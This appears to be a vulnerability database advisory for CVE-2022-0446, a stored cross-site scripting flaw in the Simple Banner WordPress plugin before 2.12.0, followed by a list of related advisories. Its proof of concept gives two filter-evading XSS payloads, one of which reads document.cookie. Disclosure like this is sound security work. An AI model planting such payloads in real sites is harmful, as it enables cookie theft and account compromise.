Simple Banner < 2.12.0 – Admin+ Stored Cross Site Scripting | CVE 2022-0446 | Plugin Vulnerabilities

Description

The plugin does not properly sanitize its "Simple Banner Text" Settings allowing high privilege users to perform Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed.

Proof of Concept

Put the following payloads in the "Simple Banner Text" settings of the plugin:
 <a href="jav	ascript&colon;alert(document.cookie)">Firefox</a>
 <sc<script>ript>alert(/XSS/)</scr</script>ipt>

Then access the frontend to trigger the XSS

Affects Plugins

Fixed in 2.12.0

References

CVE

Classification

Type

XSS

OWASP top 10

A7: Cross-Site Scripting (XSS)

CWE

CVSS

Miscellaneous

Original Researcher

Rohan Chaudhari

Submitter

Rohan Chaudhari

Submitter website

https://www.linkedin.com/in/rohan-chaudhari-53aa51174

Verified

Yes

WPVDB ID

3fc7986e-3b38-4e16-9516-2ae00bc7a581

Timeline

Publicly Published

2022-07-26 (about 1 years ago)

Added

2022-07-26 (about 1 years ago)

Last Updated

2022-08-25 (about 1 years ago)

Other

Published

Title

Published

2015-02-01

Title

Incoming Links <= 0.9.9b - referrers.php XSS

Published

2022-10-21

Title

OAuth Client by DigitialPixies <= 1.1.0 - Admin+ Stored Cross-Site Scripting

Published

2023-11-07

Title

WP Crowdfunding < 2.1.7 - Reflected XSS

Published

2019-05-15

Title

WP Live Chat Support < 8.0.27 - Unauthenticated Stored XSS

Published

2010-11-05

Title

Vodpod Video Gallery <= 3.1.7 - Cross-Site Scripting (XSS)